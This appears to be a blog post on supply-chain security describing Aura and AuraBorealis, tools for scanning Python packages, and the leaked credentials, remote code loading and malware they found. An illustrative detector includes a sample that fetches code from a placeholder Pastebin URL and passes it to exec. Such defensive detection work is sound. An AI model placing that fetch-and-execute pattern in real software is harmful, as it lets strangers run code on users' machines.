AuraBorealis: How We Found 20 Vulnerable Python Packages

Aug. 24, 2021

John Speed Meyers IQT Labs, Engineer
Martin Carnogursky Sourcecode.ai, Creator of Aura
Mona Gogia IQT Labs, Senior Engineer
Kinga Dobolyi Formerly IQT Labs, Data Scientist
George P. Sieniawski IQT Labs, Senior Technologist
Mark Huson IQT, Network Operations Engineer
Taejas Ram IQT Labs, Data Scientist Intern

You rely on open source software. For instance, you might use the Mozilla Firefox browser or depend on OpenSSL, the cryptographic toolkit that has become a pillar of the modern web. Perhaps the web pages you visit regularly–or the ones your business depends on–are built with open source components like the web application framework Flask or the database technology MySQL.

Easily overlooked is that the security of the open source ecosystem, especially the package managers, is handled by, well, hardly anyone.

That’s right: the programmer equivalents of Apple’s app store, like the Python Package Index, have become critical to modern digital society and yet few people, let alone organizations, have the funding, incentives, and tools to secure them. (OpenSSF, a nascent industry collaboration to secure open source software, is a bright spot though! Similarly, Benjamin Balder Bach and Hanno Boeck have done admirable work hunting for vulnerabilities and bringing attention to Python typosquatting.)

Earlier this year, IQT Labs started an open source collaboration with Martin Čarnogurský of sourcecode.ai to build a tool we call AuraBorealis, a web application that makes searching for vulnerable, anomalous, and malicious Python packages easy and, dare we say it, fun. Based on Aura, a static analysis tool Martin is developing to scan source code, AuraBorealis can help anyone concerned with the safety of the entire Python Package Index or the integrity of a subset of Python packages. The source code is available in the AuraBorealis GitHub repository. If you are interested in this app, particularly in discussing a beta test, contact us at jmeyers@iqt.org. You can also create GitHub issues and send pull requests to Aura or AuraBorealis.

The remainder of this blog post explains:

the static analysis tool Aura, which powers AuraBorealis by scanning Python packages for indicators of potential maliciousness,
AuraBorealis, the user-facing web app that organizes your search for vulnerable and malicious Python packages, and
the over 20 vulnerable, anomalous, or malicious Python packages found with Aura and AuraBorealis.

Aura: A Python Static Analysis Tool Designed for Large-Scale Package Scanning

Aura is a static analysis tool, which means it can search for indicators of suspicious, anomalous, or malicious code within a Python package without executing the code. Aura can scan hundreds of thousands of Python packages.

A common use of Aura involves looking for code that accidentally contains hardcoded passwords. Security teams using this feature could then notify the software developer responsible for that Python package and ask the developer to change any leaked passwords, thereby protecting themselves and other organizations that use that package. Aura can also scan a particular type of installation script (a “setup.py” script) for anomalies; longtime Python community leaders have acknowledged the dangers of this type of installation script and its susceptibility to abuse. Aura also checks for obfuscated code, performs taint analysis, and can be configured to search for custom patterns. The Aura documentation includes a full list of detections.
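To make the idea of finding hardcoded passwords without running any code concrete, here is a minimal sketch built on Python's standard `ast` module. It is not Aura's implementation; the function name `find_hardcoded_secrets` and the `SUSPICIOUS_NAMES` list are assumptions made up for this illustration, and a real detector would need far more rules.

```python
import ast

# Hypothetical name fragments that hint at a secret; NOT Aura's actual rule set.
SUSPICIOUS_NAMES = ("password", "passwd", "secret", "token", "api_key")


def find_hardcoded_secrets(source):
    """Return sorted (line number, variable name) pairs for suspicious assignments.

    The source text is only parsed into a syntax tree; it is never executed.
    """
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Assign):
            continue
        value = node.value
        # Only flag non-empty string literals on the right-hand side.
        if not (isinstance(value, ast.Constant)
                and isinstance(value.value, str)
                and value.value):
            continue
        for target in node.targets:
            if isinstance(target, ast.Name) and any(
                fragment in target.id.lower() for fragment in SUSPICIOUS_NAMES
            ):
                findings.append((node.lineno, target.id))
    return sorted(findings)


sample = '''
username = "alice"
PYPI_PASSWORD = "hunter2"
api_key = load_from_env()
'''
print(find_hardcoded_secrets(sample))
```

In this sample only `PYPI_PASSWORD` is flagged: `username` does not match a suspicious name, and `api_key` is assigned from a function call rather than a string literal.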

While the scan results for a single package can be read directly in a command line terminal, a scan of several hundred thousand Python packages can produce approximately 50 GB of audit data. We created AuraBorealis, described below, to help the security-conscious deal with this volume of data.

AuraBorealis: A Web App for Handling Large-Scale Python Security Data

AuraBorealis is the front-end web interface that an IT security team or software developer can use to assess the security of Python packages. Public and private sector organizations can use this tool to vet the Python packages underpinning their operations.

AuraBorealis is an app that presents the user with a series of pre-built tables designed to make it easier to search for potentially anomalous and malicious code. A screenshot of the main user interface is below.

Figure 1. Screenshot of AuraBorealis Homepage

AuraBorealis is a Flask-based Python web app that uses an Elastic database to store roughly 800 million objects output from Aura’s comprehensive scan of the Python Package Index.

Email jmeyers@iqt.org if you are interested in further improvements to AuraBorealis, would like to discuss the project, or would be interested in beta-testing the app. Alternatively, consider submitting issues and pull requests on the AuraBorealis GitHub page.

How We Found Twenty Vulnerable or Malicious Python Packages

Aura’s audit data–whether summarized in AuraBorealis or accessed in another format of your choosing–contains a wealth of security-related information that your organization (or the administrators of the Python Package Index) can use to secure your Python supply chain.

In fact, a recent analysis of Aura data identified 20 distinct packages with vulnerabilities. (See Table 1.)

Vulnerability Type	Package Count
Leaked PyPI Credentials	11
Using Code Downloaded from Pastebin or Other External Site	6
Leaked Other Credentials	5
Obfuscated Source Code	2

Table 1. Count of Packages by Vulnerability Type. Some packages contain multiple vulnerabilities and so are double-counted.

Eleven packages were leaking Python Package Index credentials, meaning the software developers who created them left their username and password exposed. Malicious actors could abuse these credentials by adding malicious code or taking other harmful actions. Six packages downloaded code from external websites such as Pastebin. In other words, the software developers who published these packages built in the capability to–at any time–change the code that users of these packages execute. Yes, that’s dangerous for anyone using those packages and, unless you like the idea of strangers changing your code, should be avoided. Five packages leaked other credentials, such as an Amazon Web Services S3 username and password. Two packages had highly obfuscated code that is, at the least, very suspicious. And one package was confirmed to be malware and removed from the Python Package Index.
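The pattern of downloading code from an external site and running it can also be spotted statically. The sketch below is an illustration only, not how Aura detects it: the function `remote_code_indicators`, the URL regular expression, and the placeholder Pastebin URL in the sample are all assumptions. It flags a file when it contains both a URL string literal and a direct call to `exec` or `eval`.

```python
import ast
import re

# Simplified URL matcher and dynamic-execution builtins; both are illustrative choices.
URL_PATTERN = re.compile(r"https?://[^\s'\"]+")
DYNAMIC_EXEC = {"exec", "eval"}


def remote_code_indicators(source):
    """Collect URL literals and exec/eval call sites without executing the source."""
    urls, exec_lines = [], []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            urls.extend(URL_PATTERN.findall(node.value))
        elif (isinstance(node, ast.Call)
              and isinstance(node.func, ast.Name)
              and node.func.id in DYNAMIC_EXEC):
            exec_lines.append(node.lineno)
    return {
        "urls": sorted(urls),
        "exec_lines": sorted(exec_lines),
        # Suspicious only when both indicators appear in the same file.
        "suspicious": bool(urls and exec_lines),
    }


sample = '''
import urllib.request
payload = urllib.request.urlopen("https://pastebin.com/raw/EXAMPLE").read()
exec(payload)
'''
print(remote_code_indicators(sample))
```

Requiring both indicators keeps the sketch from flagging every package that merely mentions a URL, though a heuristic this simple would still miss indirect calls and produce false positives, so its results would need human review.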

You Can’t Run, You Can’t Hide, But You Can Use Aura and AuraBorealis

You rely on open source software. Society’s dependence on open source software has become immense and irreversible. AuraBorealis offers one approach to understanding Python packages. We’ve used it to identify 20 vulnerable or malicious Python packages. If you or your organization depends on Python, we encourage you to use these tools and help us improve them. And if you are interested in piloting these tools or discussing this topic, please contact us at jmeyers@iqt.org.

Thank you to Bentz Tozer, Luke Berndt, Mike Chadwick, and Adam Van Etten for helpful review. Thank you also to George Lewis.
